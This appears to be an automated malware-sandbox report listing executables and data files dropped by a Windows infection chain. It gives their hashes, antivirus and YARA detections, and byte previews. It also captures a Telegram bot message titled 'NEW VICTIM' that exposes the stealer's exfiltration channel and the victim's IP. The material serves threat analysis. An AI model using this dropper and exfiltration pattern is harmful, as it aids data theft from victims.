                                                                                                                                                                                                      Preview:{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):727552
                                                                                                                                                                                                      Entropy (8bit):7.888061454157426
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
                                                                                                                                                                                                      MD5:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                      SHA1:39890A418FB391B823ED5084533E2E24DFF021E1
                                                                                                                                                                                                      SHA-256:9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
                                                                                                                                                                                                      SHA-512:85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1870848
                                                                                                                                                                                                      Entropy (8bit):7.948256943637
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:yKD0uV1wnSX/yZviIF03twYZlzy3IrS7ZNL+g9is:yedVSSXoviIy3lGYyZf
                                                                                                                                                                                                      MD5:6255D0D884765ABD3BB418F367CAA8E9
                                                                                                                                                                                                      SHA1:1E1FAF3970EBE15E3D2EB1CF45CB15B56B42DB8B
                                                                                                                                                                                                      SHA-256:CF0980521BB8139A249205FCB0FC320A43B182C694DB7F8D4E3DECA0E1C65F97
                                                                                                                                                                                                      SHA-512:1B666EBE033ADA719D3E9FEC9CDC4E4BE7BFF472FCF184BCBA41AD9D39D92B65816BC3ABBE29DCA90DE96298D27CF8FAAB2866D7DA1508AC2369528FBCCBAF35
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................J...........@..........................0J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...jaliwopm....../......`..............@...chtmvbnb......I......f..............@....taggant.0....J.."...j..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):772
                                                                                                                                                                                                      Entropy (8bit):5.0849952422000335
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YKOHXy1JVBa4YGQVPe071kWaPyoZERkQJE7BYTlc:YVHXQTBj/Q51mPtZgu9ulc
                                                                                                                                                                                                      MD5:8E923C32EE053D16BECBB680129BADAA
                                                                                                                                                                                                      SHA1:880D6F12C8632B136FCE1B805E7B549E7CB5FCE4
                                                                                                                                                                                                      SHA-256:25923099D8BA7A517A4DF51C01582CD91D2E7347A6277D7149E8840BCA837F80
                                                                                                                                                                                                      SHA-512:938AB8B5EAED08B5E796EAD6D50B91251AC9A0C2C312B5556F512DFC81B6F41E30E12B800E9A70C65D72A68972ECCACC608F96EB98D2079FC8EC1F957C2921A8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"ok":true,"result":{"message_id":11786,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734218493,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 89.187.171.165\nDevice Name: 704672\nLocation: Atlanta, Georgia, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":14,"type":"url"},{"offset":63,"length":12,"type":"bold"},{"offset":83,"length":9,"type":"bold"},{"offset":114,"length":8,"type":"bold"},{"offset":123,"length":13,"type":"code"}]}}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4438776
                                                                                                                                                                                                      Entropy (8bit):7.99505709582503
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                      MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                      SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                      SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                      SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                      Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1752576
                                                                                                                                                                                                      Entropy (8bit):7.935020729959646
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:6IjcXZj0IAWtYER7kEyyZkaMpDgaXNFBO2J2c+y0sRoVMY5h0RZ6xjldcQdJkM0P:6HmWtMJyZkJ0U/429BsV7IRZ6XaQEl
                                                                                                                                                                                                      MD5:896C86DB673D2FB674920380E608677B
                                                                                                                                                                                                      SHA1:9610E0CE21E13334718FC3B947041B4AE6199FF9
                                                                                                                                                                                                      SHA-256:5D218069316FF21E6C183D0F14624D2483EF19B0FFEC2516146EA2C66EDF1423
                                                                                                                                                                                                      SHA-512:9BA67AA91B0E9D37D49FFA18680630EA3B57E4EE42487992395337E94FA71E300B3EF5AA89D59CC73D616AE963207FF0003213067FDB605C6BC617BA8AA9C4AB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb.............................`E.. ... ....@.. ........................E......'....@.................................U@..i.... .......................A...................................................................................... . ..... ...t... ..............@....rsrc........ ......................@....idata . ...@......................@... ..)..`......................@...frbjvewh.....@+.....................@...odinhcyc. ...@E.....................@....taggant.@...`E.."..................@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):156917
                                                                                                                                                                                                      Entropy (8bit):7.994509354006501
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                      MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                      SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                      SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                      SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, Author: ditekSHen
                                                                                                                                                                                                      Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):970752
                                                                                                                                                                                                      Entropy (8bit):6.703941229502815
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aY8Ob:CTvC/MTQYxsWR7aY
                                                                                                                                                                                                      MD5:33E2A0EC0B8839B1DBECB8FC59CEE37A
                                                                                                                                                                                                      SHA1:B9550871DE00BD87C5E8990FF32E7771BF634905
                                                                                                                                                                                                      SHA-256:8E55D8585F852454BA66BE697EFAD31F7D0ABA3A7105587608F9A5C7F51EE4A6
                                                                                                                                                                                                      SHA-512:B25596892A989D0C7ABD7CBAFEDACDE68D258EB619C40E2775AE2FEDA2133ECB977E0497F8FC1F37D032867B4D4549105A832B2CCAAD3E903DB4230B53FABDB5
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....^g..........".......... ......w.............@..........................0.......c....@...@.......@.....................d...|....@..Le.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Le...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):393728
                                                                                                                                                                                                      Entropy (8bit):6.004737079894222
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
                                                                                                                                                                                                      MD5:DFD5F78A711FA92337010ECC028470B4
                                                                                                                                                                                                      SHA1:1A389091178F2BE8CE486CD860DE16263F8E902E
                                                                                                                                                                                                      SHA-256:DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
                                                                                                                                                                                                      SHA-512:A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):56832
                                                                                                                                                                                                      Entropy (8bit):6.175357336062413
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:qRfgKBRI0ioTIxttnf7htH6aLXx9Wgrs:aoKg0Ratnf7/rLB9Wgrs
                                                                                                                                                                                                      MD5:DAD92292227E72A4A6D88BB64A5530AB
                                                                                                                                                                                                      SHA1:B29347362DE7BC1F024BEF9E816E22DCAE43876F
                                                                                                                                                                                                      SHA-256:E0BBEB44A30E92FCF141C350B4D4240C488821EDE6CF83B03C1B7D726A87C5F5
                                                                                                                                                                                                      SHA-512:D3F3B4B35FE4BD012B7D2C8D5B3BB434A50661EF4D1DFF8CE0F5EF47D9B5B6E808286C39EEF766ED53C4D09D54FC08EA1E3592B41C942B0E4F81E8DE33AE58B3
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p]g..............0.............f.... ........@.. .......................@............@.....................................W.... ............................................................................... ............... ..H............text...l.... ...................... ..`.reloc..............................@..B.rsrc........ ......................@..@................H.......H............j......[....................................................0..T.......(.... ^j.T ....a%..^E....*...............+((..... ..-7Z ..f.a+.(..... .|l.Z ...*a+.*.0..D....... .E'"(...+.(....(..... ./G. (...a%...^E............K...................8..... D...(...+.(.........(....(.......(......-. M|/$%+. .[..%&.. @...Za+. !.p.(...+...(.......... ,J..(...+(.......(....(....,. ..q.%+. ....%&.. i.(.Za86.....(.....~....(...... Sz{.Z .[i-a8....~....(...... jZ.Z /j..a8.........
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):5620184
                                                                                                                                                                                                      Entropy (8bit):7.4294455162276405
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:EEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:NEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                                                                                                                      MD5:99185DC24928425C630A83F657AF829D
                                                                                                                                                                                                      SHA1:0A7DE2250C1177025445FE5E514DB984CA372B3E
                                                                                                                                                                                                      SHA-256:C1A6894D6EFD36511E74445A9A22879BEFE87998631E35B372D48DF90EF4D11E
                                                                                                                                                                                                      SHA-512:64127B4390276DBA1310C5F66C47A754302475604626B5FE57144669B1E25C0A1D13E056AD66070DF3C7DB42B33B0D7640C8007CF5AC60BFBAC305BF528AE609
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.._....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):309760
                                                                                                                                                                                                      Entropy (8bit):6.300290167119982
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:mJNMAvoYumDMaLVA/HmH6iWmL/M+VK0lNSOBYJ0tYRVxGGPTY:HAvoYumDHVA/m9WmLlVK0lNQHPTY
                                                                                                                                                                                                      MD5:A9502D407C7A3E0C43AD669C27638793
                                                                                                                                                                                                      SHA1:BF0B7815C6DAC82643A5BF7BD397A6AA58A9E803
                                                                                                                                                                                                      SHA-256:5F3CD8392C045A321CCF0EDE6F38A4016A236F257D0A6AB897BF7F3E21868135
                                                                                                                                                                                                      SHA-512:0DBE8772DED05BA2C67EA7A7E9BC291B76D8B73DBAB86A35FCA5B1138BE41C2EE7A54333FCD7BF58823AB3B5F1F6250B98B829CA0C367CAFB2176350F5454D25
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4M'.4M'.4M..M$.4M'.5M+.4MH..M-.4MH..M&.4MH..M&.4MRich'.4M................PE..d...Zs]g.........."......:...4......h4.........@..........................................@..................................................r..(.......(.......X....................................................................P..h............................text...j8.......:.................. ..`.rdata...$...P...$...>..............@..@.data...............................@....pdata..X............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                      Entropy (8bit):4.9485431528176616
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:5LKS39zKE0g6cJv1Vpv//fTdD3Dd5LJW1CRW35jY:934g6cJv1j/Xn3WV5k
                                                                                                                                                                                                      MD5:6F52D4DB1877B789A41E3D246FE72071
                                                                                                                                                                                                      SHA1:48ABD4ED82586E3872427C3D56926D944C2863B3
                                                                                                                                                                                                      SHA-256:BB0E62DF940826B0F7D7DF84E86192B1ABCF027153A2F65D9BF2E14419198F3A
                                                                                                                                                                                                      SHA-512:7AABB236FFB855699AE947681CFADA064AD3DA7CECDD78B8928E0DC5AB000D166327842B4598968317AFC614B0F6396F33ED80DD4B85D8345E544A7A0C858476
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1834496
                                                                                                                                                                                                      Entropy (8bit):7.947620086095118
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:05+SKvXhag1L9rYoMaf3nHwKUXBKTgEdjVS1:y+SKvh11VYoMafg1BSpVS1
                                                                                                                                                                                                      MD5:6C1D0DABE1EC5E928F27B3223F25C26B
                                                                                                                                                                                                      SHA1:E25AB704A6E9B3E4C30A6C1F7043598A13856AD9
                                                                                                                                                                                                      SHA-256:92228A0012605351CF08DF9A2AD4B93FA552D7A75991F81FB80F1AE854A0E57D
                                                                                                                                                                                                      SHA-512:3A3F7AF4F6018FCBD8C6F2871270504731CF269134453C9A146351C3E4A5C89165ECCCAFB3655D8B39C1FF1EC68F06E1851C0ABD66D47602E1F0F8E36D4ACFE9
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................H...........@...........................H..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ubvmxkob.........z...^..............@...xdawalmh.....pH.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):772
                                                                                                                                                                                                      Entropy (8bit):5.083180302015318
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YKOHdy1JVBa4YGQVPe071kWxPyoZERkQJE7BYTlc:YVHdQTBj/Q51NPtZgu9ulc
                                                                                                                                                                                                      MD5:21760E1483AA894CC79E9D5DCBA06FEC
                                                                                                                                                                                                      SHA1:24806E2720F670F7568E484B2AC942066DEC0C76
                                                                                                                                                                                                      SHA-256:FEB2DD7DFB4F9E86EAB1E3B2F7DF75B119837C49F660ED0D451E2A56DE22EF22
                                                                                                                                                                                                      SHA-512:8EE332A8D990858284909D0DBF8BA0FF26E58BF5C63EEB40EEF900709B56F048B77965419EBE2F8A975C2E4BFE384C13048152780C8A783E097676F8B30F5F82
                                                                                                                                                                                                      Malicious:false
